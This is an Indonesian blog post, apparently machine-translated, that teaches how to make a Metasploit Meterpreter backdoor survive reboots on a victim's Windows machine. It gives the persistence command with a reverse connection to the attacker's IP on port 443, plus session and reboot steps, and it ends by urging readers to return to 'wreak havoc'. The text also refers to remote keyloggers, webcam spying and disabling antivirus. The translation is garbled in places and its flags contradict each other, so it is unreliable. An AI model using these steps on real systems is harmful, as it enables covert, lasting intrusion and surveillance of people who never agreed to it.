Hallo steemit Indonesia ....
Sebagian besar posting terbaru saya telah membahas Metasploit's Meterpreter dan apa yang dapat kami lakukan setelah kami menyematkannya di sistem korban. Ini termasuk menginstal sebuah keylogger dari jarak jauh, memungkinkan webcam, mengaktifkan mikrofon dan merekam, menonaktifkan perangkat lunak antivirus, di antara banyak hal lainnya. Daftarnya hampir tak terbatas.
Sayangnya, Meterpreter berhenti bekerja jika sistem korban di-reboot. Akibatnya, banyak dari Anda telah menulis kepada saya untuk bertanya apakah kita dapat mempertahankan atau mempertahankan Meterpreter pada sistem korban.
Jawabannya adalah "Ya!" Yang tegas.
Kita bisa menyematkan Meterpreter dan kemudian kembali lagi nanti-bahkan setelah komputer korban telah di-reboot-dan berhubungan kembali dengan backdoor atau pendengar kita yang kecil. Saya mendedikasikan posting ini untuk menunjukkan kepada Anda bagaimana melakukan ini.
Mulai
Mari berasumsi bahwa Anda telah berhasil menyematkan Meterpreter di sistem korban, dan Anda memiliki layar yang terlihat seperti gambar di bawah ini. Jika Anda tidak yakin bagaimana melakukan ini, lihat beberapa tulisan saya sebelumnya untuk mendapatkan bantuan.
Tahap pertama.
Metasploit memiliki naskah yang disebut ketekunan yang memungkinkan kita membuat Meterpreter (pendengar) yang gigih pada sistem korban. Pertama mari kita lihat pilihan yang tersedia saat kita menjalankan scrip ini dengan menggunakan saklar -h.
Pada prompt Meterpreter, ketik berikut ini:
Kita bisa lihat di screenshot diatas itu ...
-Sebuah saklar memulai penangan yang cocok untuk terhubung ke agen.
-Dengan tombol -L, kita memberi tahu sistem tempat menempatkan Meterpreter pada sistem target.
-Switch -P memberitahu sistem apa muatan yang akan digunakan (Windows / Meterpreter / reverse_tcp adalah defaultnya, jadi kami tidak akan menggunakan switch ini).
-S memulai agen saat boot dengan hak istimewa sistem.
-Saklar -U memulai agen saat pengguna (U) log on.
-The -x switch memulai agen saat sistem boot.
Dengan saklar -i kita dapat menunjukkan interval waktu antara setiap upaya koneksi.
-Switch -p menunjukkan port, dan akhirnya ...
Saklar -r menunjukkan alamat IP dari sistem (r) yang menjalankan Metasploit.
Di sini kita akan menggunakan switch -A, -L, -x, -i, -p, dan -r.
Ketik pada prompt Meterpreter:
meterpreter >run persistence –A –L c:\ -X 30 –p 443 –r 192.168.1.113.
Perintah ini kemudian akan menjalankan skrip ketekunan yang akan memulai penangan yang sesuai (-A), letakkan Meterpreter di c: \ pada sistem target (-L c: \), mulai pendengar saat sistem boot (-x ), Memeriksa setiap 30 detik untuk koneksi (-i 30), terhubung pada port 443 (-p 443), dan terhubung ke sistem lokal (kita) pada alamat IP 192.168.1.113.
Saat kita menjalankan perintah ini, inilah yang harus kita lihat.
Tahap kedua.
Membuka Sesi Kedua
Kita dapat melihat bahwa kita telah membuka sesi Meterpreter pada sistem korban.
Kami kembali ke permintaan Metasploit kami, dengan mengetikkan:
meterpreter > background.
Ini akan mengembalikan kita ke prompt msf, dimana sekarang bisa mengetik:
Msf exploit (ms08_067_netapi)> sesi -i
Kita melihat di atas bahwa sekarang kita memiliki dua atau lebih sesi yang berjalan pada sistem korban (saya benar-benar memiliki tiga sesi yang berjalan pada korban ini) karena Meterpreter yang gigih telah membuka sesi kedua mengenai sistem tersebut.
Tahap ketiga
Pengujian
Ini semua sangat bagus, tapi kuncinya di sini adalah apakah Meterpreter akan terhubung kembali ke sistem kami bahkan setelah reboot sistem target. Kita bisa menguji ini dengan mengetik;
Meterpreter> reboot
Ini akan me-reboot mesin target / korban dan jika kita berhasil, Meterpreter akan terhubung kembali ke sistem kita.
Bahkan setelah sistem di-reboot, Meterpreter pada sistem korban mencoba untuk terhubung ke kami setiap 30 detik sampai berhasil membuka sesi untuk kami.
Sekarang kita telah berhasil membuka koneksi yang terus-menerus pada sistem korban sehingga kita dapat kembali berkali-kali untuk mendatangkan malapetaka!...
Thank you ..